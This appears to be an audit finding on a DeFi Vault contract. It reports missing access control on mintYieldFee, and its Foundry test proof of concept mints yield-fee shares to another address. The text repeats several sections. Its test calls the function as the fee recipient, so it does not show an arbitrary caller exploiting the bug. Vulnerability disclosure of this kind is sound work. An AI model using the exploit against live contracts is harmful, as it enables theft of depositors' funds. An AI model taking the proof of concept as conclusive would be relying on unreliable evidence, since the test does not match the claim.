Everybody can call the mintYieldFee function in the Vault, when there is _yieldFeeTotalSupply available and mint shares to himself for free, which latter results in stealing funds form the Vault. (if this is a desired behavior, which it shouldn't based on the docs, the function can still be frontrun, and result in a malicious actor minting shares for free)
function testMintYieldFee() public {
vault.setYieldFeeRecipient(alice);
// vault._increaseYieldFeeBalance(5 * 1e9); <== simulates the result of liquidate function call
vm.startPrank(alice);
console.log('Balance of bob before: ', vault.balanceOf(bob));
console.log('Yield fee total supply: ', vault.yieldFeeTotalSupply());
console.log('Yield Fee Recipient: ', vault.yieldFeeRecipient());
console.log('Bob address: ', bob);
vault.mintYieldFee(5000000000, bob);
console.log('Yield fee total after: ', vault.yieldFeeTotalSupply());
console.log('Balance of bob after: ', vault.balanceOf(bob));
console.log('Balance of alice after: ', vault.balanceOf(alice));
vm.stopPrank();
}
The result will be:
Logs:
Balance of bob before: 0
Yield fee total supply: 5000000000
Yield Fee Recipient: 0xBf0b5A4099F0bf6c8bC4252eBeC548Bae95602Ea
Bob address: 0x4dBa461cA9342F4A6Cf942aBd7eacf8AE259108C
Yield fee total after: 0
Balance of bob after: 5000000000
Balance of alice after: 0
Tools Used
Manual Review
Recommended Mitigation Steps
Add a modifier in the mintYieldFee function that requires the caller or the receiver to be the yieldFeeReceipient_
Lines of code
https://github.com/GenerationSoftware/pt-v5-vault/blob/b1deb5d494c25f885c34c83f014c8a855c5e2749/src/Vault.sol#L394-L402
Vulnerability details
Impact
Everybody can call the mintYieldFee function in the Vault, when there is _yieldFeeTotalSupply available and mint shares to himself for free, which latter results in stealing funds form the Vault. (if this is a desired behavior, which it shouldn't based on the docs, the function can still be frontrun, and result in a malicious actor minting shares for free)
Proof of Concept
Everybody can call the mintYieldFee function in the Vault, when there is _yieldFeeTotalSupply which is increased in the liquidate function at https://github.com/GenerationSoftware/pt-v5-vault/blob/b1deb5d494c25f885c34c83f014c8a855c5e2749/src/Vault.sol#L550-L587. The liquidator is out of scope for this contest, this is why the _yieldFeeTotalSupply was increased manually. Example: After executing liquidate we have _yieldFeeTotalSupply = 5 * 1e9;
The result will be:
Tools Used
Manual Review
Recommended Mitigation Steps
Add a modifier in the mintYieldFee function that requires the caller or the receiver to be the yieldFeeReceipient_
Assessed type
Access Control